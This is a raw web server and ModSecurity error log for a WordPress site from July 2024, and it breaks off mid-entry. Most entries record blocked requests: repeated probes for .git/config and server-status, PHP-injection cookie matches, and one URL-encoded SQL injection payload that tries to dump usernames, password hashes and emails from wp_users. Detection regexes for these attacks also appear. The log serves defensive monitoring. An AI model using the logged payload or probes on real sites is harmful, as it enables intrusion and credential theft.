[tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG6DbJWLg2ecbngu9JlQAAAIM"] [Sun Jul 07 16:21:45.599532 2024] [:error] [pid 31926:tid 139722592577280] [client 141.98.81.37:38266] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG6Xug2jzbr_AlO3d0RQAAAMk"] [Sun Jul 07 16:21:48.210672 2024] [:error] [pid 31926:tid 139722642933504] [client 141.98.81.37:38268] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosG7Hug2jzbr_AlO3d0RgAAAMM"] [Mon Jul 08 00:23:28.418472 2024] [authz_core:error] [pid 30828:tid 139722559006464] [client 157.245.113.227:45526] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/08 00:23:31 [error] 30703#30703: *168862 access forbidden by rule, client: 157.245.113.227, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Jul 08 03:35:27.779136 2024] [ssl:warn] [pid 9287:tid 140384300836736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 08 03:35:40.231311 2024] [ssl:warn] [pid 9288:tid 140384300836736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 08 03:35:40.881318 2024] [ssl:warn] [pid 9288:tid 140384300836736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 08 03:35:43.380652 2024] [ssl:warn] [pid 9288:tid 140384300836736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 08 03:35:45.737532 2024] [ssl:warn] [pid 9706:tid 140369629333376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jul 08 03:35:54.085052 2024] [ssl:warn] [pid 9714:tid 140369629333376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/07/08 07:45:28 [error] 9596#9596: *171699 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /web/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171698 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /assets/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171700 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /back/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171702 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /htdocs/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171701 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /backend/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171703 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171699 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171697 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /www/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171698 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /http/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171700 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /var/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171720 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /wp-content/themes/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171700 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /site/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171720 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /s3/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171703 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /wiki/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171699 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /home/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171700 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /wp-content/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171703 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /wp-content/plugins/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171699 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /css/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171700 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /git/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171703 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /index/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171697 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /login/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171701 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171702 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/07/08 07:45:28 [error] 9596#9596: *171698 access forbidden by rule, client: 83.147.52.49, server: mail.investigacionperu.com, request: "GET /vendor/.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Mon Jul 08 08:41:10.546067 2024] [authz_core:error] [pid 10345:tid 140369438193408] [client 164.90.208.56:52432] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/08 08:41:14 [error] 9597#9597: *172053 access forbidden by rule, client: 164.90.208.56, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Jul 08 09:29:32.795770 2024] [:error] [pid 9732:tid 140369413015296] [client 176.105.233.31:52918] [client 176.105.233.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[][taxonomy]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2cconcat_ws%28%27%2c%27%2cuser_login%2cuser_pass%2cuser_nicename%2cuser_email%29%20from found within ARGS:calculate_attribute_counts[][taxonomy]: %22%29union%20all%20select%201%2cconcat_ws%28%27%2c%27%2cuser_login%2cuser_pass%2cuser_nicename%2cuser_email%29%20from%20wp_users%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-json/wc/store/products/collection-data"] [unique_id "Zov3zDfQpZlpk9tr1BlM5wAAAEQ"] [Mon Jul 08 10:51:56.968849 2024] [autoindex:error] [pid 10345:tid 140369211627264] [client 165.232.189.51:53936] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Jul 08 15:07:01.255644 2024] [autoindex:error] [pid 9731:tid 140369236805376] [client 193.26.115.188:58854] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jul 08 22:40:08.166913 2024] [:error] [pid 9732:tid 140369413015296] [client 51.15.184.67:37312] [client 51.15.184.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZoyxGDfQpZlpk9tr1BlQRAAAAEQ"], referer: www.google.com [Mon Jul 08 22:40:11.840247 2024] [:error] [pid 10345:tid 140369312339712] [client 51.15.184.67:37314] [client 51.15.184.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZoyxG6IEx8Zp0Hv8PPG51gAAAMc"], referer: www.google.com [Tue Jul 09 03:06:23.393193 2024] [ssl:warn] [pid 3190:tid 140258370738048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 09 03:06:31.635070 2024] [ssl:warn] [pid 3199:tid 140258370738048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 09 03:06:32.207248 2024] [ssl:warn] [pid 3199:tid 140258370738048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 09 03:06:34.256412 2024] [ssl:warn] [pid 3199:tid 140258370738048] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 09 03:06:36.601929 2024] [ssl:warn] [pid 3617:tid 139853753091968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jul 09 03:06:40.800164 2024] [ssl:warn] [pid 3619:tid 139853753091968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/07/09 17:57:52 [error] 3515#3515: *191064 access forbidden by rule, client: 197.200.244.9, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jul 09 23:57:08.391416 2024] [authz_core:error] [pid 7405:tid 139853337396992] [client 139.59.143.102:59958] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/09 23:57:13 [error] 3517#3517: *195736 access forbidden by rule, client: 139.59.143.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Jul 10 03:32:25.389445 2024] [ssl:warn] [pid 11516:tid 139657935890304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 10 03:32:29.770704 2024] [ssl:warn] [pid 11522:tid 139657935890304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 10 03:32:30.198113 2024] [ssl:warn] [pid 11522:tid 139657935890304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 10 03:32:32.084164 2024] [ssl:warn] [pid 11522:tid 139657935890304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 10 03:32:34.367413 2024] [ssl:warn] [pid 11937:tid 140181124757376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 10 03:32:42.747804 2024] [ssl:warn] [pid 11940:tid 140181124757376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 10 03:32:43.555657 2024] [ssl:warn] [pid 11940:tid 140181124757376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 10 06:16:25.898861 2024] [autoindex:error] [pid 12093:tid 140180786755328] [client 20.171.146.7:39424] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jul 10 13:08:23.363364 2024] [authz_core:error] [pid 12776:tid 140180916832000] [client 64.227.32.66:46612] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/10 13:08:27 [error] 12059#12059: *203773 access forbidden by rule, client: 64.227.32.66, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205790 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /index/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205791 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /s3/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205792 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /http/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205793 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /wp-content/plugins/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205794 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /css/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205795 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /wiki/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205796 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /wp-content/themes/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205798 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /backend/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205799 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /git/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205797 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /dev/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205800 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /assets/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205801 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /back/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205803 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /app/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205802 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /web/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205804 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /var/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205805 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /site/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205807 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205806 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /login/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205790 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205791 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /www/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205808 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /htdocs/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205809 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /home/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205793 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /vendor/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/07/10 17:08:14 [error] 12058#12058: *205810 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /wp-content/.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Wed Jul 10 17:08:18.185421 2024] [ssl:warn] [pid 11940:tid 140181124757376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 10 17:08:52.580862 2024] [ssl:warn] [pid 11940:tid 140181124757376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 10 17:09:07.542890 2024] [ssl:warn] [pid 11940:tid 140181124757376] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 10 17:11:27.120758 2024] [ssl:warn] [pid 19690:tid 139625061320576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 10 17:11:35.334292 2024] [ssl:warn] [pid 19719:tid 139625061320576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 10 21:23:05.585893 2024] [:error] [pid 19722:tid 139624853395200] [client 45.76.18.86:54974] [client 45.76.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zo9CCQXnvMMDK4yStNuoMwAAAIM"], referer: www.google.com [Wed Jul 10 21:23:09.833426 2024] [:error] [pid 19908:tid 139624613603072] [client 45.76.18.86:54976] [client 45.76.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zo9CDTY7_Q-4cN1PQ-NQNgAAANc"], referer: www.google.com [Wed Jul 10 22:15:35.871066 2024] [:error] [pid 19908:tid 139624870180608] [client 52.180.157.104:55828] [client 52.180.157.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zo9OVzY7_Q-4cN1PQ-NQyAAAAME"], referer: www.google.com [Wed Jul 10 22:15:36.098848 2024] [:error] [pid 19721:tid 139624647173888] [client 52.180.157.104:55830] [client 52.180.157.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zo9OWN7a2ptqL19xdqFdMQAAAFM"], referer: www.google.com [Thu Jul 11 03:19:21.819429 2024] [ssl:warn] [pid 25251:tid 139840331274112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 11 03:19:28.109703 2024] [ssl:warn] [pid 25255:tid 139840331274112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 11 03:19:28.549990 2024] [ssl:warn] [pid 25255:tid 139840331274112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 11 03:19:30.591448 2024] [ssl:warn] [pid 25255:tid 139840331274112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 11 03:19:32.885695 2024] [ssl:warn] [pid 25678:tid 140073944221568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jul 11 03:19:37.129966 2024] [ssl:warn] [pid 25681:tid 140073944221568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/07/11 13:26:15 [error] 25555#25555: *13905 access forbidden by rule, client: 54.173.227.219, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jul 11 20:34:11.304230 2024] [authz_core:error] [pid 25706:tid 140073563543296] [client 139.162.210.205:54702] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/07/11 20:34:15 [error] 25554#25554: *18487 access forbidden by rule, client: 139.162.210.205, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jul 11 23:32:52.983544 2024] [:error] [pid 25707:tid 140073597114112] [client 77.111.247.44:57582] [client 